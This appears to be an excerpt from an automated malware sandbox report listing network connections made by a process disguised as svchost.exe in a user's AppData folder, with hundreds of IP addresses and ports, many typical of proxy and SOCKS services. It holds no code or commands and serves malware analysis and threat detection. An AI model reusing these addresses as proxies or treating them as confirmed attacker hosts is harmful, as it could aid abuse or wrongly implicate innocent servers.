                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 177.234.194.155 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 213.145.137.102 37447
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 140.83.32.175 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 52.73.224.54 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 82.165.105.48 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 162.214.227.68 60433
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 36.92.77.241 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 70.166.167.38 57728
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 148.72.206.84 2536
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.172.218.164 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.25.64.27 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.207.199.82 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 199.58.185.9 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 207.180.198.241 17228
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.207.199.80 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 162.240.208.98 43704
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 67.213.210.168 46716
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 61.133.66.69 9002
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 119.13.78.93 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 85.25.177.53 58851
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 5.135.83.214 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.223.239.166 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 142.54.239.1 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.153.154.6 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 149.202.91.219 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 107.181.161.81 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.20.123.164 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 212.237.218.68 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.118.132.180 45449
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 139.129.162.65 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 161.97.163.52 45063
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 189.201.191.75 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 159.65.77.168 8585
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 178.94.231.93 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 41.86.46.112 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 181.143.143.125 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.210.57.243 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 89.249.65.191 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 181.143.143.126 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 14.103.24.20 8000
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 92.255.88.219 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 195.78.100.162 3629
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 201.77.96.145 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 192.252.220.89 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 154.236.189.13 1976
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 212.87.255.155 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 162.241.137.197 42350
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 93.180.222.134 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 172.67.69.9 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 5.9.169.87 30000
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 192.145.228.212 8081
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.88.57.203 32650
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.28.121.58 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.15.132.215 16379
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 185.81.153.162 3389
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.17.213.98 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 89.42.166.163 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.223.239.190 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 177.93.44.53 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 185.238.228.240 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 192.169.214.249 45108
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.69.90.57 8081
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 213.21.56.20 4153
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 195.178.33.86 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 47.243.114.192 8180
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 41.60.232.18 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 142.93.196.242 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 79.110.196.145 8081
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 98.162.25.29 31679
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 146.83.118.9 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 36.89.10.51 44268
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 121.101.135.46 8089
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 47.90.126.78 8118
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 146.59.2.183 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 185.194.11.180 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.128.133.239 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.161.99.114 48235
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 70.166.167.55 57745
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 132.148.16.169 11320
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 185.220.174.99 59967
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 190.4.58.22 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 212.112.125.44 45555
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 80.191.169.69 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 222.255.238.159 443
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 185.49.31.207 8081
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.158.77.220 16379
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 114.106.137.152 8089
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.24.136.68 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 128.140.26.12 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 162.214.225.223 43435
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.222.241.8 36219
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 171.228.159.253 5307
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 43.231.22.229 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 80.228.235.6 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 18.134.236.231 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 119.196.168.183 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 184.178.172.5 15303
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.238.12.4 3128Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.140.189.95 29003
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 83.143.24.66 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.160.207.49 32650
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 68.71.254.6 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 13.81.217.201 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.35.189.217 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 112.196.112.243 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.222.245.41 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 94.45.74.60 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.25.167.88 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 201.71.3.60 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 163.172.147.89 16379
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 13.232.245.132 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.117.109.9 4153
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 41.217.220.214 32650
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.62.235.18 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.105.228.66 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.117.109.5 4153
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 159.65.39.234 7732
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 110.164.175.110 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.223.246.226 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 202.162.219.10 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 198.101.13.111 25543
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 66.70.197.196 8050
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.21.85.109 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 172.67.181.197 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 202.144.134.150 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 155.185.15.56 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 154.205.152.96 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 5.78.44.6 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 91.222.198.125 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 94.131.63.120 58378
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 54.36.122.16 29796
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 202.159.19.213 443
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 47.111.179.60 8877
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 86.110.189.118 42539
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 201.168.8.74 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 162.241.50.179 40179
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 142.54.228.193 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 178.207.8.20 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.207.199.87 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 20.169.221.14 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 47.94.83.254 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 27.123.3.141 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 43.157.50.206 443
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.249.78.25 83
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 200.108.197.2 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 177.8.113.61 50297
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 27.112.70.59 1111
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 201.182.251.142 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 165.227.196.37 63637
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 3.9.71.167 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 194.163.159.94 35081
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.158.124.167 16379
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 185.118.153.110 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.217.226.43 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 125.25.40.38 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.217.226.44 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.15.133.214 16379
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 88.255.102.114 1082
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.217.226.45 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.125.240.237 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.12.31.3 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 202.159.60.65 443
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.169.254.185 2068
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 47.57.115.226 9050
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 204.48.31.203 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 37.187.141.160 2604
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 162.19.7.53 17979
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 201.251.155.253 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.81.186.179 58630
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.35.111.101 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 52.13.248.29 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 155.50.209.50 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 2.229.249.153 4145
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 115.127.2.230 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 18.135.211.182 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 111.224.11.180 8089
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.174.145.12 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 176.8.230.197 8187
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 35.182.11.156 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.17.16.87 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.158.72.165 16379
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 170.82.231.253 4153
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 213.151.79.84 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 173.212.240.168 46664
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.210.127.15 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 113.252.44.133 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.174.145.11 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 103.85.103.129 5678
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 31.7.65.18 443
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 162.19.7.61 49319
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.217.226.40 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 50.217.226.42 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 170.239.207.241 999
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 88.210.20.144 20000
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 201.157.254.26 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 195.138.73.54 44017
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 200.54.22.74 8080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 51.250.13.88 80
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 65.1.40.47 1080
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 47.243.205.1 3128
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 218.145.131.182 443
                Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 43.228.213.24 3128
                Source: global trafficTCP traffic: Count: 10 IPs: 197.234.13.14,197.234.13.24,197.234.13.57,197.234.13.27,197.234.13.97,197.234.13.45,197.234.13.55,197.234.13.44,197.234.13.5,197.234.13.52
                Source: global trafficTCP traffic: Count: 10 IPs: 184.178.172.13,184.178.172.23,184.178.172.26,184.178.172.14,184.178.172.25,184.178.172.28,184.178.172.17,184.178.172.5,184.178.172.18,184.178.172.11
                Source: global trafficTCP traffic: 103.216.51.36 ports 0,2,3,32650,5,6
                Source: global trafficTCP traffic: 13.234.24.116 ports 1080,1,2,3,3128,8
                Source: global trafficTCP traffic: 46.17.63.166 ports 4154,9480,0,1,9091,10000,4444,9,16379
                Source: global trafficTCP traffic: 62.171.131.101 ports 41055,25847,3,4,7,37447,1629
                Source: global trafficTCP traffic: 45.11.95.166 ports 6010,6012,6003,6014,6002,6005,6016,6015,6004,0,3,6,6009,6008
                Source: global trafficTCP traffic: 45.11.95.165 ports 5031,5021,5044,5000,6014,6035,6002,5003,5047,5037,5026,0,4,5,5214,6039,5018,5019,5219
                Source: global trafficTCP traffic: 207.180.234.220 ports 42692,47476,36946,2,4,6,9,30507,37736
                Source: global trafficTCP traffic: 188.163.170.130 ports 41209,0,1,2,4,9
                Source: global trafficTCP traffic: 164.92.86.113 ports 64110,54093,62987,57391,55651,2,57552,6,7,54597,8,9,50564,60283
                Source: global trafficTCP traffic: 43.131.248.165 ports 15673,1,3,5,6,7
                Source: global trafficTCP traffic: 162.214.102.195 ports 0,34227,3,58994,5,6,60891,50366
                Source: global trafficTCP traffic: 203.96.177.211 ports 33382,2,3,55005,8,15901
                Source: global trafficTCP traffic: 107.180.88.173 ports 3,4,53312,5,35774,7
                Source: global trafficTCP traffic: 166.62.38.100 ports 6322,56191,54083,0,3,4,5,2453,8
                Source: global trafficTCP traffic: 92.205.110.47 ports 17158,19600,1,3,14936,4,6,9
                Source: global trafficTCP traffic: 46.253.143.144 ports 1080,1,2,3,3128,8
                Source: global trafficTCP traffic: 162.241.6.97 ports 63360,44607,59991,45629,1,31794,5,50563,60651,9
                Source: global trafficTCP traffic: 162.241.158.204 ports 63360,44607,59991,0,31794,2,5,52980,50563,60651,8,9
                Source: global trafficTCP traffic: 37.187.77.58 ports 64494,49507,14470,21861,59870,0,52593,3139,4,5,7,9,13412,18936,13574,37920,19767,29380
                Source: global trafficTCP traffic: 92.204.135.37 ports 16591,26927,63462,8623,22942,62969,2,58604,3,4,5,20491,51229,32524,33899,34824
                Source: global trafficTCP traffic: 110.49.34.126 ports 0,2,3,32650,5,6
                Source: global trafficTCP traffic: 41.217.223.145 ports 0,2,3,32650,5,6
                Source: global trafficTCP traffic: 198.57.195.42 ports 38242,1,6,7,8,9,17986
                Source: global trafficTCP traffic: 72.10.160.90 ports 8011,25257,25763,29129,25985,2789,27451,2,28389,5,25087,7
                Source: global trafficTCP traffic: 178.33.163.156 ports 24156,0,2,3,4,8,42380
                Source: global trafficTCP traffic: 72.10.160.170 ports 21687,5385,8881,4583,0,1,1205,2,5,22173,1911,9949
                Source: global trafficTCP traffic: 130.255.162.199 ports 44234,44740,2,3,4,52039
                Source: global trafficTCP traffic: 62.182.114.164 ports 2,3,5,6,59623,9
                Source: global trafficTCP traffic: 51.222.241.157 ports 40351,22538,44029,51718,27206,5717,1,5,30011,7,2563,46286
                Source: global trafficTCP traffic: 128.199.221.91 ports 7176,17532,8004,33383,1,58108,6,7,50223
                Source: global trafficTCP traffic: 162.55.26.132 ports 31280,0,1,2,3,8
                Source: global trafficTCP traffic: 191.103.219.225 ports 48612,1,2,4,6,8
                Source: global trafficTCP traffic: 51.89.16.111 ports 49528,2,4,5,8,9
                Source: global trafficTCP traffic: 195.177.217.131 ports 22842,58053,2,5,8,52858
                Source: global trafficTCP traffic: 161.97.173.42 ports 62289,2,6,52463,59799,8,9,60693,53948,27172
                Source: global trafficTCP traffic: 185.109.184.150 ports 0,63819,56067,5,6,54565,7
                Source: global trafficTCP traffic: 103.149.194.40 ports 0,2,3,32650,5,6
                Source: global trafficTCP traffic: 91.108.130.111 ports 0,2,3,32650,5,6
                Source: global trafficTCP traffic: 37.187.91.192 ports 21981,27898,1,2,7,11721
                Source: global trafficTCP traffic: 162.214.227.68 ports 45540,34071,55392,0,3,4,60433,6,56796,31825,37976,52208
                Source: global trafficTCP traffic: 148.72.206.84 ports 2536,2,3,14815,5,6,34761
                Source: global trafficTCP traffic: 207.180.198.241 ports 37443,25279,27666,57327,3,4,60148,7,55823,13168,17228,37209
                Source: global trafficTCP traffic: 161.97.163.52 ports 9045,26358,45725,32092,64109,0,31125,4,22040,5,9,45063
                Source: global trafficTCP traffic: 162.241.137.197 ports 42350,40604,0,4,6,60200,36534,61041
                Source: global trafficTCP traffic: 103.88.57.203 ports 0,2,3,32650,5,6
                Source: global trafficTCP traffic: 51.15.132.215 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 51.161.99.114 ports 48235,29758,2,5,7,8,9
                Source: global trafficTCP traffic: 132.148.16.169 ports 41824,0,1,2,3,11320
                Source: global trafficTCP traffic: 51.158.77.220 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 162.214.225.223 ports 37581,43435,54917,48414,63452,43265,49556,34071,49806,58240,0,4,6,31473,8,9,50753
                Source: global trafficTCP traffic: 51.222.241.8 ports 36219,1,2,62916,3,6,9
                Source: global trafficTCP traffic: 163.172.147.89 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 41.217.220.214 ports 0,2,3,32650,5,6
                Source: global trafficTCP traffic: 54.36.122.16 ports 44587,17188,2,6,29796,7,9,39713
                Source: global trafficTCP traffic: 177.8.113.61 ports 0,2,50297,5,7,9
                Source: global trafficTCP traffic: 165.227.196.37 ports 53718,63399,63637,61899,3,6,7
                Source: global trafficTCP traffic: 51.158.124.167 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 51.15.133.214 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 51.81.186.179 ports 0,3,5,58630,6,8,51405
                Source: global trafficTCP traffic: 195.138.73.54 ports 44017,0,1,31145,4,7
                Source: global trafficTCP traffic: 146.59.18.246 ports 15860,40975,0,30673,29066,4,5,7,9,49871
                Source: global trafficTCP traffic: 92.204.135.203 ports 0,1,2,10824,4,29212,8
                Source: global trafficTCP traffic: 50.63.12.33 ports 9367,23859,45134,61464,1,34644,3,25492,14738,31785,4,50781,5,22450,58507,52814,30920
                Source: global trafficTCP traffic: 51.15.230.100 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 162.240.72.139 ports 20614,47418,0,1,2,25591,4,6,37445
                Source: global trafficTCP traffic: 51.89.173.40 ports 17982,27887,3100,44719,23313,23854,20435,30199,2,3,55198,4,60775,5,8,51511,11058,31724
                Source: global trafficTCP traffic: 163.172.169.27 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 159.223.71.71 ports 49922,59243,59098,54370,1,60512,59159,61818,52542,5,51187,6,51213,64193,51616
                Source: global trafficTCP traffic: 162.241.66.135 ports 40604,3,4,34455,36829,5,51535
                Source: global trafficTCP traffic: 146.59.70.29 ports 2,3,5,52276,9,37665,32953
                Source: global trafficTCP traffic: 114.108.177.104 ports 0,4,60984,6,8,9
                Source: global trafficTCP traffic: 203.188.245.98 ports 2,3,5,7,8,52837
                Source: global trafficTCP traffic: 43.155.130.182 ports 15673,1,3,5,6,7
                Source: global trafficTCP traffic: 162.240.231.211 ports 41166,62109,0,1,60415,2,60589,6,35541,9
                Source: global trafficTCP traffic: 20.205.61.143 ports 8123,1,2,3,8,80
                Source: global trafficTCP traffic: 138.68.155.22 ports 44660,1,11712,2,3467,7,10760,19987
                Source: global trafficTCP traffic: 45.55.196.194 ports 0,3,60743,4,6,7
                Source: global trafficTCP traffic: 162.241.46.40 ports 64353,41442,62244,49401,56241,34172,0,1,4,9,46097
                Source: global trafficTCP traffic: 199.85.209.166 ports 29657,2,5,6,7,9
                Source: global trafficTCP traffic: 163.172.144.132 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 66.228.35.209 ports 14321,23344,56560,1,2,3,4
                Source: global trafficTCP traffic: 45.117.179.179 ports 6522,14791,27836,1932,2,35942,5,6,17827,18701
                Source: global trafficTCP traffic: 50.62.134.139 ports 1,62607,3,36916,2655,6,9
                Source: global trafficTCP traffic: 163.172.165.36 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 165.22.98.229 ports 43433,44253,45751,44537,3,4
                Source: global trafficTCP traffic: 165.227.104.122 ports 41443,29992,3,5,8,9,58839
                Source: global trafficTCP traffic: 73.151.59.35 ports 20816,0,1,2,6,8
                Source: global trafficTCP traffic: 181.129.183.19 ports 53281,1,2,3,5,8
                Source: global trafficTCP traffic: 164.68.107.253 ports 1,2,4,7,8,48172
                Source: global trafficTCP traffic: 94.23.220.136 ports 43751,25256,40767,1,59415,3,4,5,7,35805,19547
                Source: global trafficTCP traffic: 162.241.46.6 ports 64353,62592,41442,61579,1,53477,5,6,7,9
                Source: global trafficTCP traffic: 66.228.37.252 ports 46695,7841,24360,4,5,6,9
                Source: global trafficTCP traffic: 147.124.212.31 ports 11070,4671,13276,30508,3,24230,6,7,9,30479,36779
                Source: global trafficTCP traffic: 8.219.177.134 ports 15673,1,3,5,6,7
                Source: global trafficTCP traffic: 104.238.111.107 ports 5484,21453,5452,45883,3230,0,2,28394,3,60214,36049,8968,37963,7999
                Source: global trafficTCP traffic: 43.255.113.232 ports 8083,8081,8084,0,1,8,80,84,85
                Source: global trafficTCP traffic: 197.234.13.52 ports 0,36902,2,3,6,9
                Source: global trafficTCP traffic: 82.113.157.122 ports 31280,0,1,2,3,8
                Source: global trafficTCP traffic: 162.240.10.35 ports 0,3,4,5,6,50463
                Source: global trafficTCP traffic: 107.180.103.214 ports 45870,61634,1,3,4,6
                Source: global trafficTCP traffic: 194.233.78.142 ports 35760,34471,41119,1,35513,3,4,7
                Source: global trafficTCP traffic: 37.120.162.180 ports 0,2,3,4,7,42370
                Source: global trafficTCP traffic: 92.204.134.38 ports 25825,52929,9375,15393,7785,42571,25675,29718,1555,55425,56177,5,54467,28695,7,51123,8,30747,59727
                Source: global trafficTCP traffic: 88.202.230.103 ports 8896,17045,3,13638,4,6,7,9,39647
                Source: global trafficTCP traffic: 185.158.114.14 ports 25697,2,5,6,7,9
                Source: global trafficTCP traffic: 162.210.192.135 ports 23674,2,3,4,6,7
                Source: global trafficTCP traffic: 43.131.242.162 ports 15673,1,3,5,6,7
                Source: global trafficTCP traffic: 37.44.238.2 ports 1,53471,3,4,5,7
                Source: global trafficTCP traffic: 67.43.227.228 ports 6133,13077,8323,9039,24431,1,3,6
                Source: global trafficTCP traffic: 67.43.227.227 ports 15383,8149,12261,16155,1099,2251,22269,0,4607,2843,14947,12879,1489,4,6,7,4479,15885,14505,1615
                Source: global trafficTCP traffic: 67.43.227.226 ports 6133,1,2,3,6,7,30999,12673
                Source: global trafficTCP traffic: 94.247.241.70 ports 0,3,4,5,6,53640,51006
